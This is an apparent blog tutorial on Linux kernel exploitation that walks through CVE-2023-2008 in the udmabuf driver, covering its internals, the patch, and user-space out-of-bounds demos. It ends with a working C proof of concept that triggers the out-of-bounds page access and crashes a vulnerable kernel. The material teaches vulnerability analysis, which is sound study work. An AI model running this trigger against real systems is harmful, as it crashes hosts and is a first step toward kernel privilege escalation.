Introduction to practical Linux kernel exploitation

Despite the Linux kernel being highly used in modern computers, its internals usually are not documented by following each function call, macro expansion, and so on. This makes our lives more difficult when we are trying to understand how Linux subsystems are implemented. On the other hand, vulnerability analysis is one of the best approaches to understanding a specific kernel submodule and its interaction with the whole system, as it dives into the implementation and logic details. Thus, it is possible to merge the “high-level” Linux documentation and the vulnerability analysis approaches to create a complete study context.

This way, we can do the following:

Choose an exciting vulnerability;
Understand the kernel submodule the vulnerability is in;
Perform different tests to understand the relation of the vulnerable code with the rest of the kernel;
Write an exploit that allows us to take advantage of the vulnerable code.

This line of thinking was inspired by what Nicolas Fabretti did in the Lexfo’s security blog, where he created a walkthrough to develop a Linux kernel exploit from a CVE description.

For our first article, we wanted to choose a vulnerability type with straightforward exploitation (Out of bounds) in a common kernel subsystem (heap memory management). Thus, we choose the CVE-2023-2008, a flaw in udmabuf device driver page fault handler. Despite there being an already existent public exploit and its write-up, our goal is to demonstrate how we can understand a kernel subsystem starting from a CVE description and the exploitation technique. Therefore, the udmabuf concepts described here are not new, as we aim to increment this knowledge with a full context approach and several practical examples.

In light of this information, we will describe the environment we will work on, and analyze the CVE description and the patch that corrected the bug. This will give us the kernel submodule we need to study and guide our practical approach.

Environment

Before we begin with the CVE, let’s see how we can set our environment:

Download Ubuntu 18.04 iso: https://releases.ubuntu.com/18.04/
Normal installation, without updating any packages
On the first boot, upgrade all packages to the last 18.04 Ubuntu version
Download the 5.4.84 Linux kernel (a vulnerable Linux kernel version): https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.4.84.tar.gz
Install dependencies
- build-essential
- flex
- bison
- libssl-dev
- libelf-dev
Compile the Linux kernel 5.4.84
- make olddefconfig
- modify the .config
  - CONFIG_DEBUG_INFO=n
  - CONFIG_DEBUG_INFO_BTF=n
  - CONFIG_SYSTEM_TRUSTED_KEYS=””
- make -j $(nproc) bindeb-pkg
- Install the kernel with: dpkg -i *.deb
Modify the /dev/udmabuf file. This needs to be done because, on this Ubuntu version, non-root users could not access this driver. On the recent versions, the kvm group can access it.
- sudo chmod 666 /dev/udmabuf

CVE overview

Now that we have our environment set up, we can move to the CVE analysis. The CVE-2023-2008 description is:

A flaw was found in the Linux kernel’s udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.

The vulnerability patch can be found here.

First, we need to identify the main bug. The description “memory access past the end of an array” is exactly the definition of an Out-of-bounds (OOB) bug. At this point, it’s uncertain which operations (read or write) are available in the unauthorized accessible memory. Besides, it’s triggered by “user-supplied data”, enabling us to trigger the bug. In addition, the description confirms that is possible to escalate privileges and execute arbitrary code in kernel mode. Moreover, the description indicates that the vulnerable code is in the udmabuf device driver.

Now, let’s take a look at the patch code. Even though we still don’t know what is a udmabuf or a vm_area, we can infer some things.

Vulnerable code:

static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	struct udmabuf *ubuf = vma->vm_private_data;

	vmf->page = ubuf->pages[vmf->pgoff];
	get_page(vmf->page);
	return 0;
}

Patched code:

static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	struct udmabuf *ubuf = vma->vm_private_data;
	pgoff_t pgoff = vmf->pgoff;

	if (pgoff >= ubuf->pagecount)
		return VM_FAULT_SIGBUS;
	vmf->page = ubuf->pages[pgoff];
	get_page(vmf->page);
	return 0;
}

We already know that we are dealing with accessing an array offset after its end. Then, we can infer that the member “pgoff” is the offset we are trying to access, and the “pagecount” is the total number of elements in the array in question. It explains the patched code, as it verifies if the offset is less or equal to the total number of the array size.

Now we need to situate ourselves in the kernel, in other words, we need a context. This is the time for us to understand what is udmabuf. After that, we will understand how OOB can be exploited. Then, we will return to this point and try to understand how to explore the bug.

Udmabuf driver

As stated here, udmabuf is an interface to use dma-bufs. But what is a dma-buf? The name DMA refers to Direct Memory Access, which is the capacity of a device to access the host memory (RAM) without involving the CPU. The advantage of such a mechanism is that the CPU doesn’t need to stop its processing to perform the memory accesses on behalf of devices. One big example of a device that uses DMA is the GPU, as it needs to constantly read and write large amounts of data to/from the memory. This leads us to the definition of dma-buf:

The dma-buf subsystem provides the framework for sharing buffers for hardware (DMA) access across multiple device drivers and subsystems, and for synchronizing asynchronous hardware access. As an example, it is used extensively by the DRM subsystem to exchange buffers between processes, contexts, library APIs within the same process, and also to exchange buffers with other subsystems such as V4L2.

Since dma-buf is a complex subsystem, we will focus on the necessary to understand the udmabuf.

By reading the definition, we can say that dma-buf is used to share memory buffers across different entities, such as DMA-capable devices, processes, etc.

The dma-buf architecture is based on exporters and importers. Exporters are the owners of the shared buffer and define what operations can be performed on this memory area. Once the exporter allocates the memory and defines the operations, it can share the memory with the importers. Udmabuf allows user-space processes to become exporters, enabling them to create shared buffers through anonymous files.

Anonymous files are defined like this:

An anonymous file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released.

Thus, udmabuf allows the user-space application to create the shared memory, but it abstracts both what physical memory will be used and the available operations on this memory through the anonymous file. It makes sense since user-space applications don’t have the power to define such things.

Despite these definitions being hidden from the user-space owner, it still can define the memory size (by truncate() the anonymous file), share the memory (by sharing the anonymous file descriptor), add constraints to the memory region (by adding seals to the anonymous files), and so on. Let’s take a look at how an anonymous file can be created, how to use it as the udmabuf shared memory, and how to manage it.

int mem_fd = memfd_create("test", MFD_ALLOW_SEALING);
if (mem_fd < 0)
    errx(1, "couldn't create anonymous file");

The syscall memfd_create() is used to create an anonymous file. It receives the name of the created file (which will appear at /proc/self/fd/ directory) and some flags that define the behavior of the memfd_create. After the creation, the syscall will return the file descriptor that identifies the created file.

The file is created empty. To determine the size of the file (the size of the memory that backs the file) we can use the truncate syscall like this:

if (ftruncate(mem_fd, 4096) < 0)
    errx(1, "couldn't truncate file length");

In this example, we set the file size to 4096 bytes.

We can also use seals (if we pass the flag MFG_ALLOW_SEALING at memfd_create()) to impose some constraints on the file, like preventing it from growing or shrinking, preventing modification, and so on. To add a seal, we will use the fcntl syscall, which is a syscall that manipulates file descriptors. Here is an example:

if (fcntl(mem_fd, F_ADD_SEALS, F_SEAL_SHRINK) < 0)
    errx(1, "couldn't seal file");

In this example, we passed the file descriptor that will we operate on, we identified that we wanted to add a seal at the file pointed by the file descriptor (via F_ADD_SEALS parameter) and added the desired seal. In this example, we added the F_SHEAL_SHRINK seal, which prevents the file from shrinking. The available seals can be found in the fcntl manual.

At this point, we have the anonymous file with the desired constraints. We can now create a udmabuf using our file. By “a udmabuf”, we mean a dma-buf created through the udmabuf driver. The interface that the kernel provides to user-space processes to create udmabufs is the /dev/udmabuf file and some ioctl commands. The first thing we have to do is to open this file:

int dev_fd = open("/dev/udmabuf", O_RDWR);
  if (dev_fd < 0)
    errx(1, "couldn't open device");

After this, we will use the returned file descriptor to issue commands via ioctl sycall. ioctl is a generic syscall that is commonly used by device drivers to create new interfaces to the user space, without creating new syscalls. This syscall receives a file descriptor (that is used to identify the driver that will handle the command), the command, and the parameters. Each driver creates new commands with arbitrary parameters. Since the command needs to be unique across the system, some macros are used to create them (_IO, _IOW, _IOR, _IORW). The operations provided by a certain driver are usually available in its header files.

To create a udmabuf, we will perform the following ioctl command:

struct udmabuf_create
{
  uint32_t memfd;
  uint32_t flags;
  uint64_t offset;
  uint64_t size;
};

#define UDMABUF_CREATE _IOW('u', 0x42, struct udmabuf_create)

struct udmabuf_create create = { 0 };
create.memfd = mem_fd;
create.size  = 4096;

int udmabuf_fd = ioctl(dev_fd, UDMABUF_CREATE, &create);
if (udmabuf_fd < 0)
    errx(1, "couldn't create udmabuf");

Before issuing the actual command, we need to prepare its parameters. The udmabuf expects a struct udmabuf_create which references the file descriptor of the anonymous file (memfd) that will back the shared memory and its size. After this, we can issue the ioctl passing the /dev/udmabuf file descriptor, the creation command, and the parameter. This will return the udmabuf’s file descriptor, which can be shared with the importers.

Once an importer gets the udmabuf file descriptor, it can map it to its memory through mmap syscall, in other words, it can set a range of its address space to be the shared memory.

For the next section, we will dive into the udmabuf driver kernel side, which means that we will understand how all the previous operations are handled by the kernel.

Kernel-side view of udmabufs

First of all, the udmabuf is a kernel module, and to put it simply, it is a piece of code that is loaded into the kernel and executes in the privileged context. A Linux kernel module needs to provide two basic functions: init, and exit. Both of them are executed when the module is loaded and unloaded respectively. In our case, the udmabuf implements them as the following:

static const struct file_operations udmabuf_fops = {
	.owner		= THIS_MODULE,
	.unlocked_ioctl = udmabuf_ioctl,
};

static struct miscdevice udmabuf_misc = {
	.minor          = MISC_DYNAMIC_MINOR,
	.name           = "udmabuf",
	.fops           = &udmabuf_fops,
};

static int __init udmabuf_dev_init(void)
{
	return misc_register(&udmabuf_misc);
}

static void __exit udmabuf_dev_exit(void)
{
	misc_deregister(&udmabuf_misc);
}

module_init(udmabuf_dev_init)
module_exit(udmabuf_dev_exit)

The udmabuf init function, udmabuf_dev_init, will call misc_register, which is an auxiliary function to create a generic device file inside /dev directory. Its parameter is a struct miscdevice that mainly defines the file name and a set of operations that can be executed on the device file. The operations are defined in the struct file_operations udmabuf_fops. This set of operations will implement the ioctl ones. In this case, the fops are in the unlocked_ioctl because of the kernel ioctl call reformulation, which doesn’t necessarily require locking mechanisms. .unlocked_ioctl = udmabuf_ioctl references to the function:

static long udmabuf_ioctl(struct file *filp, unsigned int ioctl,
			  unsigned long arg)
{
	long ret;

	switch (ioctl) {
	case UDMABUF_CREATE:
		ret = udmabuf_ioctl_create(filp, arg);
		break;
	case UDMABUF_CREATE_LIST:
		ret = udmabuf_ioctl_create_list(filp, arg);
		break;
	default:
		ret = -ENOTTY;
		break;
	}
	return ret;
}

This is the ioctl core functionality, which will define all operations and how they are handled. Each switch entry on this function will refer to an operation that is passed as the second parameter of ioctl syscall. This parameter is then evaluated to call the desired operation. Let’s first analyze the UDMABUF_CREATE and another function that is also used to create udmabufs called UDMABUF_CREATE_LIST.

UDMABUF_CREATE operation calls udmabuf_ioctl_create:

static long udmabuf_ioctl_create(struct file *filp, unsigned long arg)
{
	struct udmabuf_create create;
	struct udmabuf_create_list head;
	struct udmabuf_create_item list;

	if (copy_from_user(&create, (void __user *)arg,
			   sizeof(create)))
		return -EFAULT;

	head.flags  = create.flags;
	head.count  = 1;
	list.memfd  = create.memfd;
	list.offset = create.offset;
	list.size   = create.size;

	return udmabuf_create(&head, &list);
}

This function is a wrapper to the udmabuf_create. Before call the underlying function, it creates a list of size one.

UDMABUF_CREATE_LIST calls udmabuf_ioctl_create_list:

static const u32    list_limit = 1024;

static long udmabuf_ioctl_create_list(struct file *filp, unsigned long arg)
{
	struct udmabuf_create_list head;
	struct udmabuf_create_item *list;
	int ret = -EINVAL;
	u32 lsize;

	if (copy_from_user(&head, (void __user *)arg, sizeof(head)))
		return -EFAULT;
	if (head.count > list_limit)
		return -EINVAL;
	lsize = sizeof(struct udmabuf_create_item) * head.count;
	list = memdup_user((void __user *)(arg + sizeof(head)), lsize);
	if (IS_ERR(list))
		return PTR_ERR(list);

	ret = udmabuf_create(&head, list);
	kfree(list);
	return ret;
}

Again, just another wrapper. The copy_from_user and memdup_user are functions to copy a memory segment from user space. The latter calls copy_from_user, but it allocates the memory that will be used as the destination. They are used to copy the syscall parameters to the kernel.

The list used in both cases is an array with additional info. The struct udmabuf_create_list is the head of the list and contains the size __u32 count, some flags __u32 flags, and the list items struct udmabuf_create_item list[]. Each item holds a file descriptor __u32 memfd, an offset __u64 offset, and a size __u64 size.

At this point, we still don’t know what operations the driver will perform on the list because it wasn’t used yet. But we can see that they are data about anonymous files that the exporter created.

Checking the list head and item structs:

struct udmabuf_create_item {
	__u32 memfd;
	__u32 __pad;
	__u64 offset;
	__u64 size;
};

struct udmabuf_create_list {
	__u32 flags;
	__u32 count;
	struct udmabuf_create_item list[];
};

Now we can enter the udmabuf_create function knowing that it expects a list, and in some cases, the list will contain only one element. This function is somewhat long, so we decided to split it into two parts to make it easy to understand.

static const size_t size_limit_mb = 64;

static long udmabuf_create(const struct udmabuf_create_list *head,
			   const struct udmabuf_create_item *list)
{
	DEFINE_DMA_BUF_EXPORT_INFO(exp_info);
	struct file *memfd = NULL;
	struct udmabuf *ubuf;
	struct dma_buf *buf;
	pgoff_t pgoff, pgcnt, pgidx, pgbuf = 0, pglimit;
	struct page *page;
	int seals, ret = -EINVAL;
	u32 i, flags;

	ubuf = kzalloc(sizeof(*ubuf), GFP_KERNEL);
	if (!ubuf)
		return -ENOMEM;

	pglimit = (size_limit_mb * 1024 * 1024) >> PAGE_SHIFT;
	for (i = 0; i < head->count; i++) {
		if (!IS_ALIGNED(list[i].offset, PAGE_SIZE))
			goto err;
		if (!IS_ALIGNED(list[i].size, PAGE_SIZE))
			goto err;
		ubuf->pagecount += list[i].size >> PAGE_SHIFT;
		if (ubuf->pagecount > pglimit)
			goto err;
	}
	ubuf->pages = kmalloc_array(ubuf->pagecount, sizeof(*ubuf->pages),
				    GFP_KERNEL);
	if (!ubuf->pages) {
		ret = -ENOMEM;
		goto err;
	}
 
   ... SNIP ...
   
   err:
	while (pgbuf > 0)
		put_page(ubuf->pages[--pgbuf]);
	if (memfd)
		fput(memfd);
	kfree(ubuf->pages);
	kfree(ubuf);
	return ret;
}

This is the allocation part. The kmalloc is a kernel heap allocation function. It starts by allocating struct udmabuf *ubuf calling ubuf = kzalloc(sizeof(*ubuf), GFP_KERNEL). Kzalloc is a wrapper for kmalloc to initialize the allocated memory with zero.

static inline void *kzalloc(size_t size, gfp_t flags)
{
	return kmalloc(size, flags | __GFP_ZERO);
}

Then, the driver verifies some size contraints and begins to allocate the ubuf->pages page array. A struct page describes a physical memory frame. It makes sense for the udmabuf driver to deal with physical memory since it is possible to share it with different processes and even with DMA-capable devices.

Finally ubuf->pages = kmalloc_array(ubuf->pagecount, sizeof(*ubuf->pages), GFP_KERNEL) is called. kmalloc_array is another wrapper to kmalloc, but this time it’ll enforce that the array is contiguous on the heap memory. What needs to be highlighted is that the bytes variable is n * size and this operation is performed with overflow protection.

static inline void *kmalloc_array(size_t n, size_t size, gfp_t flags)
{
	size_t bytes;

	if (unlikely(check_mul_overflow(n, size, &bytes)))
		return NULL;
	if (__builtin_constant_p(n) && __builtin_constant_p(size))
		return kmalloc(bytes, flags);
	return __kmalloc(bytes, flags);
}

After all the preparation above, we will move towards the last part. Some codes are purposefully copied again as we figure it’s easier to visualize.

static long udmabuf_create(const struct udmabuf_create_list *head,
			   const struct udmabuf_create_item *list)
{
	DEFINE_DMA_BUF_EXPORT_INFO(exp_info);
	struct file *memfd = NULL;
	struct udmabuf *ubuf;
	struct dma_buf *buf;
	pgoff_t pgoff, pgcnt, pgidx, pgbuf = 0, pglimit;
	struct page *page;
	int seals, ret = -EINVAL;
	u32 i, flags;

    ... SNIP ...

	pgbuf = 0;
	for (i = 0; i < head->count; i++) {
		ret = -EBADFD;
		memfd = fget(list[i].memfd);
		if (!memfd)
			goto err;
		if (!shmem_mapping(file_inode(memfd)->i_mapping))
			goto err;
		seals = memfd_fcntl(memfd, F_GET_SEALS, 0);
		if (seals == -EINVAL)
			goto err;
		ret = -EINVAL;
		if ((seals & SEALS_WANTED) != SEALS_WANTED ||
		    (seals & SEALS_DENIED) != 0)
			goto err;
		pgoff = list[i].offset >> PAGE_SHIFT;
		pgcnt = list[i].size   >> PAGE_SHIFT;
		for (pgidx = 0; pgidx < pgcnt; pgidx++) {
			page = shmem_read_mapping_page(
				file_inode(memfd)->i_mapping, pgoff + pgidx);
			if (IS_ERR(page)) {
				ret = PTR_ERR(page);
				goto err;
			}
			ubuf->pages[pgbuf++] = page;
		}
		fput(memfd);
		memfd = NULL;
	}

	exp_info.ops  = &udmabuf_ops;
	exp_info.size = ubuf->pagecount << PAGE_SHIFT;
	exp_info.priv = ubuf;
	exp_info.flags = O_RDWR;

	buf = dma_buf_export(&exp_info);
	if (IS_ERR(buf)) {
		ret = PTR_ERR(buf);
		goto err;
	}

	flags = 0;
	if (head->flags & UDMABUF_FLAGS_CLOEXEC)
		flags |= O_CLOEXEC;
	return dma_buf_fd(buf, flags);

err:
	while (pgbuf > 0)
		put_page(ubuf->pages[--pgbuf]);
	if (memfd)
		fput(memfd);
	kfree(ubuf->pages);
	kfree(ubuf);
	return ret;
}

The first for it’s when the magic starts to unfold. First, it calls memfd = fget(list[i].memfd) to retrieve the struct file associated with the anonymous file descriptor created by the user (exporter). The struct file is how the kernel keeps track of opened files, so each file descriptor in user space has an associated struct file in the kernel. Then perform the following check if (!shmem_mapping(file_inode(memfd)->i_mapping)) goto err. Going deeper to understand what this means:

struct file {
    ... SNIP ...
	struct inode		*f_inode;
    ... SNIP ...
} __randomize_layout  __attribute__((aligned(4)));

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

struct inode {
    ... SNIP ...    
	struct address_space	*i_mapping;
    ... SNIP ...
} __randomize_layout;

struct address_space {
	... SNIP ...
	const struct address_space_operations *a_ops;
    ... SNIP ...
} __attribute__((aligned(sizeof(long)))) __randomize_layout;

bool shmem_mapping(struct address_space *mapping)
{
	return mapping->a_ops == &shmem_aops;
}

First, file_inode(memfd) gets the struct inode associated with that struct file. inode is the struct responsible for describing files, directories, pipes, sockets, or any other entity that can be abstracted as a file. For the sake of comparison, there can be several struct files for a single struct inode since it’s possible to open a file multiple times.

Then, the inode’s struct address_space is passed to the function. There are a number of distinct yet related services that an address-space can provide, always related to the memory that can hold file content mappings. For an anonymous file, this structure is related to the memory that actually holds the data.

Finally shmem_mapping just compares if the struct address_space_operations of that inode’s struct address_space is the same as shmem_aops, which is the struct address_space_operations that describes the available operations in a shared memory. After all, what this means is that the driver checks if the memory created by the exporter is a shared memory, which makes sense since we are creating a udmabuf. Continuing verifying the memfd, the driver verifies that the correct seals are in place.

Now, some operations based on the list will start to execute. For each item, a page will be read page = shmem_read_mapping_page(file_inode(memfd)->i_mapping, pgoff + pgidx) and then added to the struct page* array created earlier ubuf->pages[pgbuf++] = page. It is extremely important to understand that the ubuf->pages hold the same physical page references as the exporter memfd, which means that the udmabuf has the memfd’s pages created by the exporter. All these operations are on a for loop because the exporter can pass a list of memfds to the driver (through UDMABUF_CREATE_LIST command) and all of the pages must be mapped. Finally, assuming that everything worked as expected we move to the last part.

The driver will associate the udmabuf_ops, pagecount, udmabuf struct, and flags with the struct dma_buf *buf in buf = dma_buf_export(&exp_info) and then return dma_buf_fd(buf, flags). It is important to notice that we are entering the dma_buf scope. Referencing again to the dma-buf documentation:

The exporter defines his exporter instance using DEFINE_DMA_BUF_EXPORT_INFO() and calls dma_buf_export() to wrap a private buffer object into a dma_buf. It then exports that dma_buf to userspace as a file descriptor by calling dma_buf_fd().

Moving to the next step:

Userspace passes this file-descriptors to all drivers it wants this buffer to share with: First, the file descriptor is converted to a dma_buf using dma_buf_get(). Then the buffer is attached to the device using dma_buf_attach().

Now, the exporter only needs to start sharing the file descriptor with the importers. This leads us to the next chapter: the importer.

Importers of a udmabuf

As said earlier, both the udmabuf create functions will return the udmabuf file descriptor that can be shared with the importers. One easy way to share the file descriptor is by creating another process using fork syscall from the exporter. As the documentation states

The child inherits copies of the parent’s set of open file descriptors.

Another possible alternative is over unix domain sockets.

When the importer gets the file descriptor, it can map the udmabuf physical pages on its virtual memory space and access it normally. Here we will exemplify how a regular process performs the importer operation.

void* udmabuf_map = mmap(NULL, 4096,
    PROT_READ|PROT_WRITE, MAP_SHARED, udmabuf_fd, 0);
if (udmabuf_map == MAP_FAILED)
  errx(1, "couldn't map udmabuf");

That simple! The syscall mmap will receive the udmabuf file descriptor (udmabuf_fd), its size (4096), the access rights (PROT_READ | PROT_WRITE), and use it as shared memory (MAP_SHARED). The return of the syscall is the pointer that the process will use to access the memory.

Memory mapping is a mechanism that abstracts a lot of complexity to provide simple access to a resource. When an object is memory mapped, a specific range of memory will be used as an access interface to the object. Depending on the type of the object that is being mapped, the kernel has to treat the memory accesses on that memory range differently. In our context, the udmabuf driver is the kernel subsystem responsible for implementing the required mechanisms that allow the shared buffers to be mapped. As an example, other objects also can be memory mapped such as device registers, regular files, device memory, and so on.

The mmap syscall is a function that creates a mapping inside the calling process’ virtual address. For example, if we map a regular file into a process address space, modification at this memory region will actually modify the file. In our case, the modifications on the mapped area will modify the content of the shared buffer. mmap has several parameter combinations that make it a powerful function, so feel free to analyze the manual!

Now, we will see how the mmap magic is done inside the kernel, and how the udmabuf driver registers its memory mapping operations.

On the udmabuf_create analysis we saw that the allowed operations in the udmabufs are stored in a struct dma_buf_ops that is pointed by a struct dma_buf. The udmabuf driver defines these operations in the variable called udmabuf_ops, which is a struct dma_buf_ops. The mmap operation is included in this structure.

struct dma_buf {
	... SNIP ...
	const struct dma_buf_ops *ops;
	... SNIP ...
};

struct dma_buf_ops {
    ... SNIP ...
	int (*mmap)(struct dma_buf *, struct vm_area_struct *vma);
	... SNIP ...
};

static const struct dma_buf_ops udmabuf_ops = {
    ... SNIP ...
	.mmap		  = mmap_udmabuf,
};

Looking into the mmap_udmabuf:

static int mmap_udmabuf(struct dma_buf *buf, struct vm_area_struct *vma)
{
	struct udmabuf *ubuf = buf->priv;

	if ((vma->vm_flags & (VM_SHARED | VM_MAYSHARE)) == 0)
		return -EINVAL;

	vma->vm_ops = &udmabuf_vm_ops;
	vma->vm_private_data = ubuf;
	return 0;
}

Here we are introduced to a new structure: struct vm_area_struct. A vm_area holds information about a contiguous virtual memory area. Then, for each mmap, there will be a struct vm_area_struct that describes the mapped memory range. The vm_ops member points to a struct vm_operations_struct that holds the operations on the memory range. Then, analyzing the previous code, we can verify that when a udmabuf is mapped in memory, the function mmap_udmabuf will be called and the udmabuf driver will set the operations of the mapped area as the variable udmabuf_vm_ops. Let’s take a look at this variable:

static const struct vm_operations_struct udmabuf_vm_ops = {
	.fault = udmabuf_vm_fault,
};

As we can see, the driver just implements the fault operation, that is the function executed when a page fault occurs on the rage.

Page fault handler is one of the most important functions related to memory mapping. When an access on a mapped region generates a page fault, the kernel needs to identify what is the type of the mapped object and call its specific function to resolve the fault. One situation that always generates a page fault is the first access on a mapped area. When a mapping is created, the kernel adjusts the process page table to identify that the memory is mapped, but it doesn’t fetch the physical content that backs this memory range immediately. When the first access is made, a page fault exception is raised by the hardware and the kernel executes the page fault handler function to make the page table point to the correspondent physical pages.

The page fault handler executed when any page fault is raised is a generic function that performs several operations that handle all page table levels besides the physical page number. To get the physical page frame number that will be used to translate the virtual to the physical address, the kernel needs to execute the function provided by the subsystem that manages the mapped object. In our case, this function is the udmabuf_vm_fault. That’s interesting! We have reached the buggy function that we saw at the beginning. We will continue our study with the code version without the patch.

static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	struct udmabuf *ubuf = vma->vm_private_data;

	vmf->page = ubuf->pages[vmf->pgoff];
	get_page(vmf->page);
	return 0;
}

We can verify that it receives a struct vm_fault as a parameter. This structure is created by the kernel to describe the fault that is currently being handled. The function sets the page member of this structure. This operation is exactly the point where the udmabuf drive informs the kernel which physical page is related to the faulty virtual address, as it gets the physical page from the ubuf->pages array that we already analyzed. This allows the kernel to get the physical page number and insert it on the page table, finishing the fault handle. Before returning, the udmabuf driver calls get_page function that only increments the reference counter of the page in question, as shown below:

static inline void get_page(struct page *page)
{
	... SNIP ...
	page_ref_inc(page);
}

Reference counters are widely used by the kernel to control where a resource can be freed. If the reference counter is not zero, it means that entities are using it and it can’t be freed.

All this fault path will be triggered when the importer accesses the array:

    udmabuf_map[i];

Now that we have the context about the buggy driver, we need to learn the exploit technique that allows us to take advantage of it. In other words, it’s time for us to understand OOBs.

Out-of-Bounds (OOB) vulnerabilities

Looking at the CWE definition for OOB Read we get:

The product reads data past the end, or before the beginning, of the intended buffer.

The definition is almost the same for the OOB Write, just changing the access mode for write.

As an example, we have written two simple programs (in user space) to exemplify OOB accesses. In the first one, we used variables that reside on the stack and the latter on the heap. The main difference is the stack is more straightforward in a way that when the first array ends, the second starts right after. When we perform the same OOB on the heap, we need to deal with its peculiarity, as the heap memory allocator allocates metadata before and after our buffer and aligns the buffers. Refer to Azeria’s blog for a deep explanation of glibc heap management.

We have to keep in mind that all examples were executed using Ubuntu 18.04 with kernel 5.4.84 described earlier. Using different distributions or different Ubuntu versions can imply different glibc versions, then different results.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main (void)
{
	char ptr[10];
	char ptr2[20]; 

	memset (ptr, 'j', 10);
	memset (ptr2, 'a', 20);

	printf ("diff: %lld\n", (unsigned long long) ptr2 - (unsigned long long)ptr);
    // diff: 10

	printf ("ptr: %s\n", ptr);
    // ptr: jjjjjjjjjjaaaaaaaaaaaaaaaaaaaa�

	return 0;
}

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main (void)
{
	char *ptr = malloc (10);
	char *ptr2 = malloc (20);
	unsigned long long diff = (unsigned long long) ptr2 - (unsigned long long)ptr;

	printf ("diff: %lld\n", diff);
    // diff: 32

	memset (ptr, 'j', 10);
	memset (ptr2, 'a', 20);

	printf ("ptr: %s\n", ptr);
    // ptr: jjjjjjjjjj

	memset (ptr + diff, 'y', 20);

	printf ("ptr2: %s\n", ptr2);
    // ptr2: yyyyyyyyyyyyyyyyyyyy

	return 0;
}

In the first example, which allocates both arrays in the stack, we accessed the data of the second buffer through the first pointer. It happens because the end of the ptr string is right before the start of ptr2 string, and the printf with %s starts printing byte per byte until it reaches a byte with value 0.

In the latter example, the same doesn’t work because of the heap manager operations. ptr and ptr2 aren’t contiguous, as shown by the “diff” print. When the first printf is called it stops before ptr2 because it found a byte with value 0 in between. This doesn’t stop the OOB from occurring. When the memset is called again for ptr + diff, which is the beginning of ptr2, it was possible to write on ptr2 data from ptr.

After this introduction we can understand that, in the end, the problem lies in the code that controls the accesses. If this is done improperly, we will find ourselves in the same situation in the examples above, in most cases a bit more complicated than that.

Let’s look again at the vulnerable code:

static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	struct udmabuf *ubuf = vma->vm_private_data;

	vmf->page = ubuf->pages[vmf->pgoff];
	get_page(vmf->page);
	return 0;
}

The variable we need to control is vmf->pgoff, because ubuf->pages allows any value to be accessed. This variable is set by the kernel in the fault handler by getting the relative page number from the faulty address on the virtual memory area. Which means that it will be ARRAY_POSITION / 4096.

Let’s try to perform an OOB access in the vulnerable code. The process that executes the following code will act as the exporter and after as the importer. This means that, in the same process, we will perform all exporter operations and then call mmap on the udmabuf file descriptor.

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/memfd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

struct udmabuf_create
{
  uint32_t memfd;
  uint32_t flags;
  uint64_t offset;
  uint64_t size;
};

#define UDMABUF_CREATE _IOW('u', 0x42, struct udmabuf_create)

#define NUM_PAGES 10

int main(int argc, char *argv[])
{
	struct udmabuf_create create;
	int devfd, memfd, udmabuf_fd;
	off_t size = getpagesize() * NUM_PAGES;
	char* buf;

	// exporter
	if ((memfd = memfd_create("udmabuf",  MFD_ALLOW_SEALING)) < 0)
	{
		printf("memfd_create error: %s\n", strerror(errno));
		return errno;
	}

	if (ftruncate(memfd, size))
	{
		printf("ftruncate error: %s\n", strerror(errno));
		return errno;
	}

	if (fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK) < 0)
	{
		printf("fcntl error: %s\n", strerror(errno));
		return errno;
	}

	if ((devfd = open("/dev/udmabuf", O_RDWR)) < 0)
	{
		printf("open /dev/udmabuf error: %s\n", strerror(errno));
		return errno;
	}

	memset(&create, 0, sizeof(create));
	create.memfd  = memfd;
	create.offset = 0;
	create.size   = size;

	if ((udmabuf_fd = ioctl(devfd, UDMABUF_CREATE, &create)) < 0)
	{
		printf("ioctl UDMABUF_CREATE error: %s\n", strerror(errno));
		return errno;
	}

	// importer
	if ((buf = (char*)mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, udmabuf_fd, 0)) == MAP_FAILED)
	{
		printf("mmap error: %s\n", strerror(errno));
		return errno;
	}

	if ((buf = (char*)mremap(buf, size, size * 2, MREMAP_MAYMOVE)) == MAP_FAILED)
	{
		printf("mremap error: %s\n", strerror(errno));
		return errno;
	}

	buf[0] = 'j';
	buf[1] = 'a';
	buf[2] = 'm';
	buf[3] = 'e';
	buf[4] = 's';
	buf[5] = '\0';
	printf ("arbitraty physical page read: %d\n", buf[size + 10]);

	close(udmabuf_fd);
	close(memfd);
	close(devfd);
	return 0;
}

Let’s focus on the importer part, as we already discussed everything else. We first call mmap on the udmabuf file descriptor so we can map it to our virtual memory address space. Then, mremap is needed to increase the size of the mapping, so that when we perform the out-of-bounds access, the kernel will ask the udmabuf driver for the physical page because we will still be on a udmabuf mapping. Without the mremap, the OOB access would land on a memory region that does not belong to the udmabuf driver.

After the map, we can proceed to access the buf freely. We wrote the first six characters as an example. The moment we perform buf[0] = 'j', it generates a page fault which will be handled correctly by the driver. The next 4095 bytes are now mapped. However, when we perform the OOB access on the print operation, the udmabuf driver will try to get the 11th page in ubuf->pages, which is bigger than its size. This will crash the kernel. It’s possible to check the crash log with dmesg. RIP informs the instruction that generated the crash, and it confirms that it is inside the udmabuf_vm_fault function. We can see the functions that were called through the Call Trace.

... SNIP ...

RIP: 0010:udmabuf_vm_fault+0x23/0x40

... SNIP ...

Call Trace:
 __do_fault+0x57/0x111
